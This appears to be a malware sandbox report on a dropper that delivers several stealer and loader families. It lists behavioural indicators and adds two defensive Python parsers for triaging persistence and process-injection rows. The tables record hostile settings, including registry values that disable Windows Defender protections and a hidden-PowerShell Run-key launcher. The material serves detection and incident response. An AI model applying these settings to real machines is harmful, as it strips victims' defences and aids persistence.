Analysis Overview
SHA256
6fff71e22472096a9504705dd57be5306efe418a44897afce0875aba7822a72f
Threat Level: Known bad
The file 6fff71e22472096a9504705dd57be5306efe418a44897afce0875aba7822a72f was found to be: Known bad.
Malicious Activity Summary
Glupteba payload
Amadey
Raccoon Stealer payload
SmokeLoader
RedLine
RedLine payload
DcRat
ZGRat
Raccoon
Detect ZGRat V1
Suspicious use of NtCreateUserProcessOtherParentProcess
Modifies Windows Defender Real-time Protection settings
Glupteba
Drops file in Drivers directory
Modifies Windows Firewall
Stops running service(s)
Downloads MZ/PE file
Reads user/profile data of web browsers
Windows security modification
Loads dropped DLL
Checks computer location settings
Executes dropped EXE
Legitimate hosting services abused for malware hosting/C2
Checks installed software on the system
Adds Run key to start application
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of SetThreadContext
Drops file in System32 directory
Drops file in Windows directory
Launches sc.exe
Drops file in Program Files directory
Checks for VirtualBox DLLs, possible anti-VM trick
Unsigned PE
Program crash
Enumerates physical storage devices
Creates scheduled task(s)
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
Suspicious use of SendNotifyMessage
Uses Task Scheduler COM API
Modifies data under HKEY_USERS
Suspicious use of WriteProcessMemory
Enumerates system info in registry
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Checks SCSI registry key(s)
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-10-26 07:45
Signatures
Unsigned PE
1 match; no description, indicator, process or target was recorded for this signature.
Analysis: behavioral1
Detonation Overview
Submitted
2023-10-26 07:45
Reported
2023-10-26 07:48
Platform
win10v2004-20231023-en
Max time kernel
97s
Max time network
154s
Command Line
Signatures
Amadey
DcRat
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Detect ZGRat V1
3 matches; no description, indicator, process or target was recorded for this signature.
Glupteba
Glupteba payload
2 matches; no description, indicator, process or target was recorded for this signature.
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\4853.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\4853.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\4853.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\4853.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\4853.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\4853.exe | N/A |
Raccoon
Raccoon Stealer payload
3 matches; no description, indicator, process or target was recorded for this signature.
RedLine
RedLine payload
9 matches; no description, indicator, process or target was recorded for this signature.
SmokeLoader
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 5568 created 3296 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
| PID 5568 created 3296 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
| PID 5568 created 3296 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
| PID 5568 created 3296 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
| PID 5568 created 3296 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
ZGRat
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\latestX.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\kos4.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\494E.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\65B1.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\71DA.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-9D0VB.tmp\LzmwAqmV.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-9D0VB.tmp\LzmwAqmV.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-9D0VB.tmp\LzmwAqmV.tmp | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Reads user/profile data of web browsers
Windows security modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\Temp\4853.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\4853.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\671A.exe'\"" | C:\Users\Admin\AppData\Local\Temp\671A.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\4532.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ML5UJ9UF.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SB7jI9jw.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rL2Jv7vH.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iU3eD1eN.exe | N/A |
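Added example (not code from the sandbox report): a classifier for the six rows of the "Adds Run key to start application" table above. Only one of them is persistence: the `socks5` value under the user's Run key, which relaunches `671A.exe` through hidden PowerShell. The five `wextract_cleanupN` RunOnce values are the standard artifact of a self-extracting IExpress package (wextract), which registers `rundll32.exe advpack.dll,DelNodeRunDLL32 "<dir>"` to delete its `IXP00N.TMP` extraction directory at the next logon; read in order, they also reveal how deeply the packer stages were nested. The row text is copied from the page; the kind labels, the ATT&CK mapping (T1547.001) and the function names are this example's assumptions.

```python
"""Classify Run/RunOnce rows and recover the IExpress unpacking chain.

Added example; not part of the sandbox report. Row text is copied from the
report, everything else (names, labels, mapping) is an assumption.
"""
import re
from dataclasses import dataclass

ESCAPE_RE = re.compile(r'\\(["\\])')             # the report escapes " and \ with a backslash
CLEANUP_RE = re.compile(r"^wextract_cleanup(\d+)$", re.I)
BINARY_RE = re.compile(r"[A-Za-z]:\\[^\"']*?\.(?:exe|dll)", re.I)
TECHNIQUE = "T1547.001"  # Registry Run Keys / Startup Folder (assumed mapping)


@dataclass(frozen=True)
class Autostart:
    scope: str        # "HKLM" or "HKU\<SID>"
    key_name: str     # "Run" or "RunOnce"
    value_name: str
    command: str      # unescaped command line as it would sit in the registry
    process: str      # image that wrote the value
    kind: str         # iexpress_cleanup | hidden_powershell_launcher | autostart


def parse_row(line):
    """Split one pipe-delimited report row into its four cells, else None."""
    cells = [c.strip() for c in line.strip().strip("|").split("|")]
    return cells if len(cells) == 4 else None


def split_indicator(indicator):
    """Return (key path, value name, unescaped data) for '<key>\\<name> = "<data>"'."""
    key_and_name, sep, rest = indicator.partition(' = "')
    if not sep or not rest.endswith('"'):
        return None
    key, _, name = key_and_name.rpartition("\\")
    return key, name, ESCAPE_RE.sub(r"\1", rest[:-1])


def scope_of(key):
    """\\REGISTRY\\MACHINE\\... -> HKLM; \\REGISTRY\\USER\\<SID>\\... -> HKU\\<SID>."""
    parts = key.lstrip("\\").split("\\")
    if len(parts) > 1 and parts[1].upper() == "MACHINE":
        return "HKLM"
    if len(parts) > 2 and parts[1].upper() == "USER":
        return "HKU\\" + parts[2]
    return key


def classify(value_name, command):
    if CLEANUP_RE.match(value_name) and "DelNodeRunDLL32" in command:
        return "iexpress_cleanup"       # packer housekeeping, not payload persistence
    if (re.search(r"\bpowershell(?:\.exe)?\b", command, re.I)
            and re.search(r"-w(?:indowstyle)?\s+hidden", command, re.I)):
        return "hidden_powershell_launcher"
    return "autostart"


def parse_autostarts(rows):
    entries = []
    for line in rows:
        cells = parse_row(line)
        if not cells or cells[0] == "Description":
            continue
        description, indicator, process, _target = cells
        if not description.lower().startswith("set value"):
            continue
        parsed = split_indicator(indicator)
        if parsed is None:
            continue
        key, name, command = parsed
        entries.append(Autostart(scope_of(key), key.rpartition("\\")[2], name,
                                 command, process, classify(name, command)))
    return entries


def referenced_binaries(command):
    """Executable/DLL paths named in a command line (a launcher's real payload)."""
    return BINARY_RE.findall(command)


def unpack_chain(entries):
    """wextract_cleanupN is written by the stage that extracted into IXP00N.TMP,
    so sorting the writers by N lists the packer stages from outermost inward."""
    stages = [(int(CLEANUP_RE.match(e.value_name).group(1)), e.process)
              for e in entries if e.kind == "iexpress_cleanup"]
    return [process for _, process in sorted(stages)]


# Rows copied from the report's 'Adds Run key to start application' table.
SAMPLE_ROWS = [
    r'''| Set value (str) | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\671A.exe'\"" | C:\Users\Admin\AppData\Local\Temp\671A.exe | N/A |''',
    r'''| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\4532.exe | N/A |''',
    r'''| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ML5UJ9UF.exe | N/A |''',
    r'''| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SB7jI9jw.exe | N/A |''',
    r'''| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rL2Jv7vH.exe | N/A |''',
    r'''| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iU3eD1eN.exe | N/A |''',
]

if __name__ == "__main__":
    entries = parse_autostarts(SAMPLE_ROWS)
    for e in entries:
        print(f"{e.kind:28} {e.scope}\\...\\{e.key_name}\\{e.value_name}")
    print("IExpress stages, outer to inner:", *unpack_chain(entries), sep="\n  ")
```

On this report the chain comes out five stages deep: 4532.exe extracts into IXP000.TMP, ML5UJ9UF.exe into IXP001.TMP, and so on down to iU3eD1eN.exe extracting into IXP004.TMP, where the `1fz10YT6.exe` that the SetThreadContext table shows writing into AppLaunch.exe lives. The RunOnce entries will remove those directories at the next logon, so collect the IXP00N.TMP trees before rebooting the host; the `socks5` Run value is the only autostart that needs removing.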
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3308 set thread context of 1248 | N/A | C:\Users\Admin\AppData\Local\Temp\6fff71e22472096a9504705dd57be5306efe418a44897afce0875aba7822a72f.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 4560 set thread context of 1460 | N/A | C:\Users\Admin\AppData\Local\Temp\71DA.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 5012 set thread context of 4384 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fz10YT6.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 2196 set thread context of 5708 | N/A | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe |
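Added example (not code from the sandbox report): a parser that turns the "Suspicious use of NtCreateUserProcessOtherParentProcess" rows and the "Suspicious use of SetThreadContext" rows above into one list of process-relationship findings. A creation whose recorded parent differs from the calling process is the shape of parent-PID spoofing; a thread-context write from a %TEMP% executable into a Microsoft-signed .NET host (AppLaunch.exe, RegAsm.exe) is the shape of process hollowing, and a write into a second copy of the same image is self-injection. The PIDs and image paths are copied from the page; the kind labels, the list of .NET hosts, the ATT&CK mapping and the function names are this example's assumptions.

```python
"""Parse process-creation and thread-context rows into injection findings.

Added example; not part of the sandbox report. Row text is copied from the
report, everything else (names, labels, host list, mapping) is an assumption.
"""
import re
from collections import Counter
from dataclasses import dataclass

ACTION_RE = re.compile(r"^PID (\d+) (created|set thread context of) (\d+)$")

# Signed .NET utility hosts commonly hollowed by loaders. Assumed list; the
# report itself shows AppLaunch.exe and RegAsm.exe.
DOTNET_HOSTS = {"applaunch.exe", "regasm.exe", "regsvcs.exe", "installutil.exe"}
DOTNET_DIR = "c:\\windows\\microsoft.net\\"


@dataclass(frozen=True)
class Finding:
    kind: str          # ppid_spoof | hollowed_dotnet_host | self_injection | injection
    source_pid: int    # PID that made the call
    target_pid: int    # second PID in the row
    source_image: str  # Process column
    target_image: str  # Target column: recorded parent, or the process written into
    technique: str     # ATT&CK technique ID (assumed mapping)


def parse_row(line):
    """Split one pipe-delimited report row into its four cells, else None."""
    cells = [c.strip() for c in line.strip().strip("|").split("|")]
    return cells if len(cells) == 4 else None


def basename(path):
    return path.rsplit("\\", 1)[-1]


def classify_injection(source_image, target_image):
    if source_image.lower() == target_image.lower():
        return "self_injection", "T1055"        # fresh copy of itself, then overwritten
    if (target_image.lower().startswith(DOTNET_DIR)
            and basename(target_image).lower() in DOTNET_HOSTS):
        return "hollowed_dotnet_host", "T1055.012"
    return "injection", "T1055"


def row_to_finding(line):
    cells = parse_row(line)
    if not cells or cells[0] == "Description":
        return None
    match = ACTION_RE.match(cells[0])
    if not match:
        return None
    source_pid, action, target_pid = int(match.group(1)), match.group(2), int(match.group(3))
    source_image, target_image = cells[2], cells[3]
    if action == "created":
        # The kernel recorded a parent (Target column) other than the caller.
        kind, technique = "ppid_spoof", "T1134.004"
    else:
        kind, technique = classify_injection(source_image, target_image)
    return Finding(kind, source_pid, target_pid, source_image, target_image, technique)


def parse_findings(rows):
    """Unique findings in first-seen order (the report repeats identical rows)."""
    seen = {}
    for line in rows:
        finding = row_to_finding(line)
        if finding is not None and finding not in seen:
            seen[finding] = True
    return list(seen)


def occurrences(rows):
    """How many times each finding was logged."""
    return Counter(f for f in map(row_to_finding, rows) if f is not None)


def hollowed_hosts(findings):
    """Legitimate-looking images that now carry attacker code."""
    return sorted({basename(f.target_image) for f in findings
                   if f.kind == "hollowed_dotnet_host"})


# Rows copied from the report's NtCreateUserProcessOtherParentProcess and
# SetThreadContext tables, duplicates included.
SAMPLE_ROWS = [
    r"| PID 5568 created 3296 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |",
] * 5 + [
    r"| PID 3308 set thread context of 1248 | N/A | C:\Users\Admin\AppData\Local\Temp\6fff71e22472096a9504705dd57be5306efe418a44897afce0875aba7822a72f.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |",
    r"| PID 4560 set thread context of 1460 | N/A | C:\Users\Admin\AppData\Local\Temp\71DA.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |",
    r"| PID 5012 set thread context of 4384 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fz10YT6.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |",
    r"| PID 2196 set thread context of 5708 | N/A | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe |",
]

if __name__ == "__main__":
    counts = occurrences(SAMPLE_ROWS)
    findings = parse_findings(SAMPLE_ROWS)
    for f in findings:
        print(f"{f.kind:22} {f.technique:10} {f.source_pid}->{f.target_pid} x{counts[f]}  "
              f"{basename(f.source_image)} -> {basename(f.target_image)}")
    print("hollowed hosts:", hollowed_hosts(findings))
```

The practical consequence for the responder: a process tree keyed on parent PID will hang the spoofed child under Explorer.EXE, and AppLaunch.exe and RegAsm.exe will look like ordinary Microsoft-signed .NET processes, so memory should be collected from those PIDs (1248, 1460, 4384) rather than only from the droppers. The "Program crash" table further down, with WerFault.exe reporting on RegAsm.exe and AppLaunch.exe, is worth correlating with these same hosts.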
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Drive Tools\is-4GO6G.tmp | C:\Users\Admin\AppData\Local\Temp\is-9D0VB.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files\Google\Chrome\updater.exe | C:\Users\Admin\AppData\Local\Temp\latestX.exe | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-RG4N3.tmp | C:\Users\Admin\AppData\Local\Temp\is-9D0VB.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-GASLU.tmp | C:\Users\Admin\AppData\Local\Temp\is-9D0VB.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-OVD0C.tmp | C:\Users\Admin\AppData\Local\Temp\is-9D0VB.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-TQ7L8.tmp | C:\Users\Admin\AppData\Local\Temp\is-9D0VB.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-CMG93.tmp | C:\Users\Admin\AppData\Local\Temp\is-9D0VB.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-VOFQ5.tmp | C:\Users\Admin\AppData\Local\Temp\is-9D0VB.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-PUR6E.tmp | C:\Users\Admin\AppData\Local\Temp\is-9D0VB.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-8KQKH.tmp | C:\Users\Admin\AppData\Local\Temp\is-9D0VB.tmp\LzmwAqmV.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Drive Tools\zDriveTools.exe | C:\Users\Admin\AppData\Local\Temp\is-9D0VB.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-9D0VB.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-CORJU.tmp | C:\Users\Admin\AppData\Local\Temp\is-9D0VB.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-L77R1.tmp | C:\Users\Admin\AppData\Local\Temp\is-9D0VB.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\Lang\is-DPVU5.tmp | C:\Users\Admin\AppData\Local\Temp\is-9D0VB.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-P5FNF.tmp | C:\Users\Admin\AppData\Local\Temp\is-9D0VB.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-9FQGU.tmp | C:\Users\Admin\AppData\Local\Temp\is-9D0VB.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-MC0R6.tmp | C:\Users\Admin\AppData\Local\Temp\is-9D0VB.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-8C67R.tmp | C:\Users\Admin\AppData\Local\Temp\is-9D0VB.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-IAGSL.tmp | C:\Users\Admin\AppData\Local\Temp\is-9D0VB.tmp\LzmwAqmV.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Drive Tools\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-9D0VB.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-TAT27.tmp | C:\Users\Admin\AppData\Local\Temp\is-9D0VB.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-OMPQI.tmp | C:\Users\Admin\AppData\Local\Temp\is-9D0VB.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-B2UVK.tmp | C:\Users\Admin\AppData\Local\Temp\is-9D0VB.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-U7RVB.tmp | C:\Users\Admin\AppData\Local\Temp\is-9D0VB.tmp\LzmwAqmV.tmp | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Wanugegulaho milorahaxah mosuraxupib rusekutokefod bopujune | C:\Users\Admin\AppData\Local\Temp\4A49.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
